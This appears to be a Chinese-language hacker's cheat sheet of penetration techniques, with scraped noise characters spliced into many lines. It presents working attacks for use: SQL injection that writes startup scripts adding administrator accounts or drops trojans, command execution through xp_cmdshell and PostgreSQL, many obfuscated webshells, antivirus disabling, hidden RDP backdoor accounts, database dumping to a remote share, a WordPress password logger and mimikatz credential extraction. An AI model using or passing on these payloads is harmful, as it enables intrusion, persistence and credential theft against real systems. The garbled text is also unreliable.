f8 v+ ?9 f0 Z; L8 c4 |use test;+ Y& w% x$ Z" _7 ]4 s+ m2 v
create table a (cmd text);
) d/ |5 U8 j2 g/ ?5 O! Linsert into a values ("set wshshell=createobject (""wscript.shell"") " );! L' k# H: a3 i; Y6 d+ x
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " ); {& B, c0 w* b# Y8 ~8 U+ \
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
5 o% t% x* L8 a+ Q( @select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";( B7 _) _& C" [4 V n
drop table a;) _" Y7 B- ]9 r0 f
1 b; [9 F1 ~% K
英文版本:
; `2 S4 d: u s4 C7 L9 k5 U1 f( d$ ]) N
8 T! v T0 f9 j" i" quse test;3 U2 x5 P# z- y$ n4 S
create table a (cmd text);
% |8 m Z. G5 g# Dinsert into a values ("set wshshell=createobject (""wscript.shell"") " );0 U( G3 Y D. a. ~! N3 j5 v R" a
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
& Z5 ]! n9 \1 I+ P$ ~) [; Y: Iinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );6 F+ {# x) Q! R3 ?+ q
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
! ]% D& a8 }0 ?' ]: x g+ qdrop table a;$ F$ ]1 y5 M4 R
3 a' E$ D/ \3 ~4 K
create table a (cmd BLOB);! P- Y( @% X! K) O7 @! k
insert into a values (CONVERT(木马的16进制代码,CHAR));# \1 C- c3 H2 {3 Z. y
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'9 Z. `- v6 O8 e( H. V# p2 e
drop table a;
* |( B# [! j3 P7 G1 W& _) k$ e- y: d
记录一下怎么处理变态诺顿' k# s' w6 U3 y# T* d8 T# y
查看诺顿服务的路径9 J6 L! e( A) R3 z9 f
sc qc ccSetMgr
+ K: ^; G/ H' Q4 i" M然后设置权限拒绝访问。做绝一点。。
6 M( z3 \, P g8 A$ rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
. C2 c; ?; o% Q* j; ~2 Hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
! d0 @! p( ?1 L8 W4 ]/ Acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
7 B2 `- S- w# ~ xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone ^. a$ r. R5 e1 s: n( ?" r
- J) @) M, k. H0 S然后再重启服务器. r- d6 m/ {/ L8 o
iisreset /reboot
) ^, ^: [; V5 S" |+ b这样就搞定了。。不过完事后。记得恢复权限。。。。
4 f z3 j; I4 w6 kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
" M* i& Z, p+ {! ?* i* }$ R# Icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F, ~# l" z3 x0 f7 G, R$ b9 J
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
; l& b X3 Y( x+ Rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F, [2 w5 E0 m% c2 Y/ E7 {3 l- y9 Y
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
# x0 G. s) E' P. p( Y& R5 U9 N) w5 H% R; M
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')1 O( R/ J- U& v
, P) B4 Z0 ?2 u6 S' j) B) E4 ]5 rpostgresql注射的一些东西: F5 G9 l0 |) p( l( C
如何获得webshell5 g! h7 z6 `& ~( c% y$ G3 l) G
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
" o* h; e' `/ jhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
7 S1 @5 T# M# U/ U% \: v3 n, ehttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
+ j3 o) H g2 u1 s" W如何读文件
4 O9 [4 m5 Q5 ahttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
* Q1 I% i/ `( g \- Nhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
" N7 U2 A0 Q; Nhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;, W2 e2 @8 I |4 N$ S B7 L
6 r/ d9 z6 M# e7 ~5 _0 o3 B5 T
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。# n0 R- x7 @2 ^9 Q7 Q
当然,这些的postgresql的数据库版本必须大于8.X
' p5 U% ^7 M5 E创建一个system的函数:3 A) c+ x1 j$ X
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT1 i, {: N% {7 ]5 s, \" c9 E9 J7 |% Y
9 L, v# {3 r* o; v创建一个输出表:
3 F' X7 t7 @6 |, dCREATE TABLE stdout(id serial, system_out text)
4 V& ^) D& h* Y& ]" \
, X7 g% g2 S$ q @" h执行shell,输出到输出表内:
1 S8 H8 I! E8 f+ Y- [SELECT system('uname -a > /tmp/test')
4 H8 Q# V) B G5 k+ C2 X. a3 V$ n
0 F& R( R5 d- s; ?9 Gcopy 输出的内容到表里面;4 y# {0 S$ {/ g# j7 l
COPY stdout(system_out) FROM '/tmp/test'2 h6 A4 V/ M0 e4 v+ n9 [: K
2 U& J3 M- E* u3 z" ^* a
从输出表内读取执行后的回显,判断是否执行成功( S8 r6 ]) p" Z* W! {5 w* r/ E
5 b' e# D" l2 r* I
SELECT system_out FROM stdout
- t0 h# b A6 j" J) p- S' p+ a下面是测试例子& `# M2 M' y$ R" j- ]4 U( k+ w
0 e: k" X2 W' Z6 g
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
1 |! x, N8 M# D: C, G6 K
+ ?5 ?. N: L. p/ u3 [9 h B5 [; p/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
: q' {* }# ^6 lSTRICT --
9 ~0 w, H w0 D0 ?& m9 R* B; L4 ^' p; ?$ R. q/ m; Z
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
- f4 d! F' P5 l! k- ]+ {5 o- o, ^
; Q+ R* @0 A6 V) G/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
) F& c. o. G2 n' C- ~
2 W; N7 Q) g; T9 I+ y/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--7 v' A0 B4 t- ^
net stop sharedaccess stop the default firewall( J3 m- c, k V2 G1 p
netsh firewall show show/config default firewall" N0 h2 O- ]: ~
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall( G* w% g& R0 K
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall1 P! N7 k- O' \5 L9 `( d0 Q6 W- v2 i9 K
修改3389端口方法(修改后不易被扫出)8 S6 k# j6 h1 m7 U a! ~* ]( b
修改服务器端的端口设置,注册表有2个地方需要修改& c" F( V4 b$ _$ F8 _
) {9 b5 f, q5 S" R8 l* D/ K[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]/ R% S5 m$ E' O+ h) N# c
PortNumber值,默认是3389,修改成所希望的端口,比如6000
$ i$ K* h- V& `! s( P. b
( ?; R9 P% U/ |9 l; u第二个地方:' l6 s* ?1 M- q- Y, `# J
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
9 _# J8 s0 H$ y8 NPortNumber值,默认是3389,修改成所希望的端口,比如6000% y& P0 |, j8 k8 A& T
) t- Q: ^# }9 G! j/ l! F% K# [
现在这样就可以了。重启系统就可以了% \+ B5 O; o$ }9 f s
" N- d8 \2 r6 X6 Y) K5 ]& e, J* ^
查看3389远程登录的脚本+ {; i, a, d& F2 q0 |% u
保存为一个bat文件
( Y2 R- ?) @) g7 M9 ydate /t >>D:\sec\TSlog\ts.log/ ^9 _8 a, `5 y
time /t >>D:\sec\TSlog\ts.log
) ~; S: O5 v( t( Hnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log. G& J3 p6 `5 ~+ Y# u
start Explorer
: o! b* q" C2 G3 k
' ^* R8 L/ a& j3 Mmstsc的参数:
5 @' u) x, D& m/ n+ p- }) f0 ~. t, q, h5 M p
远程桌面连接4 U7 B# c1 ]$ u$ N
; r5 A0 `7 L. C% y$ \
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]1 t+ s1 Y& A$ s9 U1 v2 h
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?; r% @0 h# {2 f8 j
/ f6 s# u5 y: `! d! c+ c0 V
<Connection File> -- 指定连接的 .rdp 文件的名称。9 N& D7 G7 R" W, n2 X
* ]+ |( m" l. o0 X$ ]/v:<server[:port]> -- 指定要连接到的终端服务器。
7 Z! Q4 W" P O" ~! i! k6 |6 G# k3 N2 d8 _9 m4 K V/ g( M' |
/console -- 连接到服务器的控制台会话。: n' ]0 i0 p2 C1 p. V
7 F. b6 J& N( {" Y O F
/f -- 以全屏模式启动客户端。
! H2 C$ E, }6 q; P
# A4 M( m8 D8 f# O7 e' I/w:<width> -- 指定远程桌面屏幕的宽度。
# @6 ^& j; X5 i! ^! r0 W# m
8 i4 e# p8 u6 u! K6 ^, \: d/h:<height> -- 指定远程桌面屏幕的高度。
/ H$ }/ v; t4 T3 i1 X2 j
`; u, c7 Y% H3 B/ q( E/edit -- 打开指定的 .rdp 文件来编辑。) M$ E" d4 I# K. Q
) b/ z+ Z, e2 s1 \2 E$ k
/migrate -- 将客户端连接管理器创建的旧版
, J* G5 t% ^7 n, ~& Q3 n; R' ?, D' ^连接文件迁移到新的 .rdp 连接文件。6 `! _$ t$ s8 D7 ^; i
* C* Q' H. e4 y+ @
J J; M4 z, E7 c0 r: S其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
) n; A2 o7 b9 L- N3 _0 Z1 _- mmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
`8 E' n; x; X( j, a
0 `% \$ ?: N2 T$ D命令行下开启3389
" ~3 t2 K0 R3 K8 b, p L1 _& snet user asp.net aspnet /add
' U. V. d8 ?7 B: Q: gnet localgroup Administrators asp.net /add
7 Z! r5 _) P" ^* e( Rnet localgroup "Remote Desktop Users" asp.net /add
+ p a4 b: F2 ?$ u) D$ Q5 vattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D0 d- X4 K: {# L% D: q- Q4 S
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
! `. v+ i) s$ \1 Zecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
1 w' c% u6 ^- a+ L& Jecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
5 \( {& e5 k1 B3 t: y( T9 y& `sc config rasman start= auto
- B1 K7 S: v& d5 @+ @! i5 ssc config remoteaccess start= auto
2 {% q) o& T2 a! Anet start rasman2 `# o, w+ K x* H: I6 E; ~
net start remoteaccess
% t5 V7 K# v4 NMedia
+ ~. J6 z: e: c2 R<form id="frmUpload" enctype="multipart/form-data"
9 u/ q- m2 O0 G* J: P9 B$ L3 paction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>4 E+ J; G$ a/ K
<input type="file" name="NewFile" size="50"><br>8 `8 h4 V- f3 f+ n F
<input id="btnUpload" type="submit" value="Upload">7 x3 S( w; B0 ]$ w9 x, M2 @
</form>
3 V8 f) g) M; v; z, G1 Z+ B+ a" w$ j
% h, R& u7 ~0 L; R- I& J! ncontrol userpasswords2 查看用户的密码
6 i/ w- ^; Y1 s f: R" Oaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
( _2 w% V! C& d3 n+ |6 QSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a. R3 A$ { @" x, `: w, ^+ M
% K+ F0 b# ~9 j0 n5 ~141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:1 }3 Q" ]+ K0 J
测试1:
! N4 @2 @, J7 E% `5 Z8 O @SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
; X; @+ b, A7 c+ o7 ?
4 }2 l6 {+ q8 _' I2 ^测试2:
% c2 U [+ x. |2 f/ E: R' L' |( }4 L( k% _& H( l' Z% W" P5 H
create table dirs(paths varchar(100),paths1 varchar(100), id int)$ S7 [5 K$ @! o: k1 E+ d
3 Y5 U1 O( X7 }" v. }
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
, K, {2 x1 f7 P: m9 a N: {0 _+ m
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
& T+ |' U: S( }6 j: E2 B关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令6 `: a3 q% g2 f7 S2 @2 \
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
9 d; v& a- K+ P& Inet stop mcafeeframework( ]: a( E1 f! y* B0 s
net stop mcshield8 z1 s* X3 K9 h+ S f: H: D7 X T
net stop mcafeeengineservice
) M& E e; \ f8 I3 Y% k* @net stop mctaskmanager
% g+ i s% x! c# g- Nhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D& [4 Q' r8 i. D0 H+ }( A) `
1 D1 k: V, @6 d% p$ T VNCDump.zip (4.76 KB, 下载次数: 1) & d! T/ ?4 f0 \( V5 W4 Z* l/ p& \" o
密码在线破解http://tools88.com/safe/vnc.php
$ {- M5 M3 Z* o! |- Y% V# X+ vVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取 N# o# n: I) h, I
( o- h+ W" M9 U( L$ D3 }
exec master..xp_cmdshell 'net user'( y* B0 j! q% Q' Y {# }( x
mssql执行命令。: z" N2 g6 j$ x* V: C; G
获取mssql的密码hash查询4 `4 R6 n( v5 n8 k& _; O
select name,password from master.dbo.sysxlogins- J; G% F! l5 `0 T/ m
% v7 H5 d4 d4 t* j* ]
backup log dbName with NO_LOG;
4 v" ]9 i8 q& W! j' K' t8 fbackup log dbName with TRUNCATE_ONLY;. Q+ h3 c. ^9 A. t
DBCC SHRINKDATABASE(dbName);
! z O0 Q; V! e1 N3 jmssql数据库压缩
0 E; H# N* r3 g
7 D5 s( }- }' }# q0 bRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
4 z: X9 ^" @% Y6 f" p将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。% S3 J6 \4 S5 Z- g& E
6 {% R% U. K+ x) p9 V3 q: ]; rbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'8 a4 F2 m. ?* L. m
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
3 T7 h" H& B8 X$ E9 L& t/ l ~' M1 x/ R: m$ b) R
Discuz!nt35渗透要点:
+ x- K8 ?0 @6 `* m) s) @(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
; Q' p3 `6 E4 ]6 w! z(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>4 i$ ^: M4 q* ]' }& N0 q* ^7 h
(3)保存。
% ?/ R! z% j3 e: ^5 P7 O8 @(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass$ v; a$ R k7 X) G4 w2 k1 X% M% c
d:\rar.exe a -r d:\1.rar d:\website\* W0 o+ S/ Q( G2 M2 q/ P
递归压缩website3 r; D3 Z$ V3 L6 C
注意rar.exe的路径
& \/ L& f6 a8 p% j- {/ y" [2 V
<?php8 v" G$ i4 d# n. ^ U
! G& Z" u5 s+ `, [5 r& _% @5 ~$telok = "0${@eval($_POST[xxoo])}";
& F7 I; W1 G4 n0 w6 Y2 a1 {
- |) I2 M$ X! J$username = "123456";- H/ B1 \- _5 B5 I
0 F7 F b* { L' K1 u* k S R$userpwd = "123456";1 p6 g2 R- y0 X( U6 G' _, K
9 u k d. k: {; z m! @. M& d
$telhao = "123456";! u2 U( z$ [+ N3 G
/ b/ ]4 _- L3 c# }# \. N
$telinfo = "123456";, ]! u: V$ P" y/ v( N
# v ~5 w; P+ n7 W; F?>
, b8 [) I' d+ J6 O$ \: f8 xphp一句话未过滤插入一句话木马; d; N2 u2 {7 U! ^* U M+ T5 k
7 R/ v' l/ U, k/ |: u- u9 z" R0 V
站库分离脱裤技巧: ~8 y; ~) N0 x$ E+ h' ~* l p# Y
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'# S7 {5 ]$ w/ U9 A& o5 w) s
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
, R' ^' ]1 f% U, s" J8 F条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。5 X; @5 C4 G* `" H
这儿利用的是马儿的专家模式(自己写代码)。' z$ V6 p0 ]7 _/ v, q
ini_set('display_errors', 1);5 b) Y1 h* _" j Q7 t5 K
set_time_limit(0);
$ [& q# N3 ^- N3 Y' }3 s" ^ _error_reporting(E_ALL);
! W0 w. \' m2 v" J- @$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
7 p' o8 m: H4 W- s2 amysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$ p0 \' c2 O2 i" q& B: Z$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
/ } B2 C% P) o( n2 P) F+ o$i = 0;
2 [% J2 V6 A+ W2 q) x3 y$tmp = '';
, e" r, W4 u$ v- r( j& Kwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {, k& I% h2 C4 a2 X4 \
$i = $i+1;
- m! ]2 e8 N2 V9 g, q $tmp .= implode("::", $row)."\n";
( e) K" P% B! s. ^1 L9 L if(!($i%500)){//500条写入一个文件3 h- [: k4 B& c
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';( \/ p5 h) a/ x) S1 \0 o: n9 Z; W
file_put_contents($filename,$tmp);3 ?- W4 I+ ^6 Z. d5 F
$tmp = '';5 N, W: V& e! c3 e9 P# V; M9 @
}
. |8 _4 W& B' x% N# `}
: C1 R/ ?! T% [mysql_free_result($result);
2 _- p) \. O4 e3 T2 Z# d8 I; n4 J+ N9 l* C" C- [
+ `" O5 D2 q* q9 D& ^* d, V5 i
( Q2 h5 v3 l% |( A! z( k//down完后delete
6 b. q8 R2 [3 N1 S! _$ n( Y, R, `# s5 G, v
' M+ U) J; N8 U; S. Wini_set('display_errors', 1);1 y" ?* y2 ~$ |- _5 k4 M/ L
error_reporting(E_ALL);# k! f; h2 M; j1 ^3 Y# A9 l
$i = 0;
9 D! j3 D9 Z) M; b2 {5 ?while($i<32) {
/ e6 r X0 Q4 A+ Q+ ?/ V' M: v" l% h $i = $i+1;8 P6 l& M, G- B) I* {
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';( D0 a- I! e0 F" {9 w Y S4 B5 A0 s
unlink($filename);2 _& _: U% D! e: J) [2 ]! g
} % ?2 ?8 V4 W6 H8 B0 a7 s7 P1 g# E
httprint 收集操作系统指纹" S; \2 u* D- |8 C
扫描192.168.1.100的所有端口" Z5 Y# P& M/ p. M4 Y3 a7 L
nmap –PN –sT –sV –p0-65535 192.168.1.100
- l. E' k5 W+ ^0 p, O% Ahost -t ns www.owasp.org 识别的名称服务器,获取dns信息
: M9 F- d# ^" n8 @: A, w [host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
$ C: m. V$ o3 T. g# ^2 r9 {Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host+ }; ?! U H9 p9 A7 d, x& R
$ z) q) `5 o$ v1 _7 z/ T3 j6 b; [
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)) O6 N! z4 [+ T4 L) o: @1 w" J7 o
. Z8 Z/ d! j2 l5 h" C MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
8 |% h2 g: J7 N% k- F+ q" ?+ X
' e! V, S4 e& R' U$ Z Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
8 c9 q* b# {7 G8 [! P& Q3 F- \. C1 L* Z; J' u3 d- I. q. \ T/ k
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
0 H* w* D+ _, ^: b4 m( n+ }" g) Q8 A( [& Q* X( n7 H1 `
http://net-square.com/msnpawn/index.shtml (要求安装)/ t P$ b K6 f. K8 q. |
! [) G) [+ E9 g# b" R. z8 \: f( T
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)! W; C- }, S9 f4 y4 q( G9 j% N- d( n
/ c3 }; m4 e4 g+ G1 G& b SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)# K" I7 @8 X( K( u/ j- o( k: B. `
set names gb2312
% |/ U6 q# q: T% O导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
; V: F4 x$ b7 v% Z5 u3 w
7 A* t+ Z5 t m( s1 ]5 O) vmysql 密码修改
5 k" Z9 V# c+ hUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
. ]' e8 T! B; H- l: O$ q8 tupdate user set password=PASSWORD('antian365.com') where user='root';- p: K" S/ `# v8 G ^
flush privileges;
* K; j- F8 \1 a& m, f高级的PHP一句话木马后门& T! m5 O$ E# |+ U6 v( l* e+ k0 c
# E% N& w. \2 V8 `, p9 T入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀2 A% S6 C1 d; R! e" u: l6 y
' J. c. [( k; ?) i; F) m
1、* b4 W) j* O7 e5 ?
& x( T% T% C; g' F9 \, z$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";0 Q" g/ B/ J: b& \* v
) T8 m# U9 h0 Z5 @( s; r1 W8 m' U1 P
$hh("/[discuz]/e",$_POST['h'],"Access");
8 @. x! T0 y; P4 k2 |2 Z* V
4 U. s2 {) m) H, ?9 o//菜刀一句话
4 V) f$ g% A- X% K3 [4 i0 l
, N, r* Z* d( z2、 G+ N3 R; Z7 G$ B, t( s
) \" p) `) R" T1 U6 w1 W; V# [$filename=$_GET['xbid'];
+ a: x# R; P- A$ ]/ u+ v
1 t" W" g9 `8 H1 S& f% j1 Ainclude ($filename);
9 R8 T+ s/ g4 ~" o( k4 J2 U2 W* }( \
//危险的include函数,直接编译任何文件为php格式运行* {# }+ n; Z' l b) X
, t! V" f9 g0 T% f
3、
$ l8 B7 i5 D0 b4 J1 ^( k0 F9 g6 p: ^
$reg="c"."o"."p"."y";
. A" @8 R/ {0 D) W
+ G/ G1 G% X* _) U: M7 O6 T$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);' c* E6 ^3 N3 [: }$ u
0 ^3 A* F4 L3 I: Z9 u3 B2 r3 V/ v
//重命名任何文件
7 x7 C! k: |/ M3 P, K
1 d: Z" R4 d, J. f) z" G4、5 j5 K4 ]4 f" E$ y7 x6 l- `6 Z
, k, V- M: A6 ?5 B7 ]8 n' _$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
+ y: ~( K5 c) p. f( ?- Q3 Y9 M M" {& n1 J5 s$ h0 z
$gzid("/[discuz]/e",$_POST['h'],"Access");
' N. a* R( D4 r% _2 e* X9 e3 r2 j, i
//菜刀一句话
6 }: Y+ |1 v( Q4 @% \0 X5 l# N5 G
+ H5 w) x9 f+ \/ h5、include ($uid);) y* Y( T) ]1 y; l# k
3 g( j/ z' r" R
//危险的include函数,直接编译任何文件为php格式运行,POST " l- a/ |' U3 k% e8 |2 [1 U4 a. e
: A5 w2 _# o* @2 w' E# W1 _6 A- C2 G, A% p3 o
//gif插一句话
- b' M7 s. M" R4 W* d5 t0 `# N9 i1 b6 N6 @; p! g
6、典型一句话
5 C J' `/ g u. X- V& M' T6 h$ m% c9 L- S& m' ?
程序后门代码
8 c4 _* \' ^) Q" G7 V8 \" m<?php eval_r($_POST[sb])?>
" s6 k7 u U/ J& v# J; Z程序代码
8 {& b7 d* K7 C8 l<?php @eval_r($_POST[sb])?>
2 }' V }8 E0 q2 E3 C: Y2 D, u4 z//容错代码
4 f: ]) e' x( H* c9 x! R/ s$ e5 Y程序代码
! x/ z; L5 F' A- l5 ?* A( N<?php assert($_POST[sb]);?>9 k9 ]2 t0 E6 J5 ^/ b
//使用lanker一句话客户端的专家模式执行相关的php语句
2 K" R* U a* p1 `% m程序代码
, ^+ P& i J( c. ?' \# [- e, c% N<?$_POST['sa']($_POST['sb']);?>
: [- t# T' ]+ Q3 C2 h! H; n4 Z( W程序代码9 ?: w8 \/ |# J0 ^. ?, }& _- L
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>+ q, _8 M* d" t! t
程序代码
9 U4 k* M; m1 K7 d6 G1 t<?php
0 `2 c& G( v7 _$ h@preg_replace("/[email]/e",$_POST['h'],"error");
* ]- R- O- I# b?>' L, t) @5 u9 I4 N. W G+ z
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
: U+ b# R; Q0 a( a程序代码
+ {4 P- c, v* F<O>h=@eval_r($_POST[c]);</O>( \: H- ^+ U. _
程序代码
# T8 h' R$ Y: O4 ?1 g<script language="php">@eval_r($_POST[sb])</script>9 k s' x5 K R- I8 w% t, [
//绕过<?限制的一句话2 ?0 ~& F; t! ?; O! E. G, \1 E
2 u" y: M8 P# G/ nhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip8 n' A0 w3 I! V0 e8 @) S" b' M& e4 Q
详细用法:$ _0 i3 N6 D3 h( ?
1、到tools目录。psexec \\127.0.0.1 cmd' F! |7 L( [; }+ A9 G
2、执行mimikatz! i* X+ r: ~2 l. D8 p2 G% ?) e
3、执行 privilege::debug
/ {# \, S$ G8 A1 |, f4、执行 inject::process lsass.exe sekurlsa.dll
' J" l" M7 h" Z) m3 s5、执行@getLogonPasswords0 T& F. z# d# R% E* |& v% Z
6、widget就是密码
0 N( R# V+ m8 i5 ~$ b7、exit退出,不要直接关闭否则系统会崩溃。
5 j% j2 S# O: g6 ?4 g# Y: ]: P1 }9 ]4 h& u# S( _
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面5 U! F6 c+ l& E) c( ]& c: }8 G
5 N* z* u/ o# y3 ?# d4 H! K% v8 j自动查找系统高危补丁- i0 J" g |! P) o& Y
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
, J0 l1 {8 e, I" X% K
& @+ ]6 Z2 _% ?: f突破安全狗的一句话aspx后门
# T* L" ]- W* y$ j<%@ Page Language="C#" ValidateRequest="false" %>
9 \2 |- I3 F8 o) P<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
9 `+ { s& e F* c' k$ U! vwebshell下记录WordPress登陆密码4 S" s* V7 x$ P, x# S0 q
webshell下记录Wordpress登陆密码方便进一步社工
1 ?: m# g9 a# `' h r# F9 G0 ?: ^在文件wp-login.php中539行处添加:3 ?/ }! O4 K$ i) v- Z0 K z
// log password6 _+ O& L ]' g, q* F( X8 O
$log_user=$_POST['log'];8 Y) }# N1 z& k1 v( k
$log_pwd=$_POST['pwd'];
+ f+ {4 P; Z1 u# M0 e9 j5 l$log_ip=$_SERVER["REMOTE_ADDR"];
1 }! S/ D$ }, L- N; e" G% U$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
" B2 l/ _( b9 W7 O" e5 r$txt=$txt.”\r\n”;
* g O& V9 @, s* d2 k9 sif($log_user&&$log_pwd&&$log_ip){
% \5 }1 m' ?2 }+ u@fwrite(fopen(‘pwd.txt’,”a+”),$txt);! d' A- e5 u4 T" n: P4 V3 ]' j, x
}
7 I6 n0 [) i, d. A( q当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
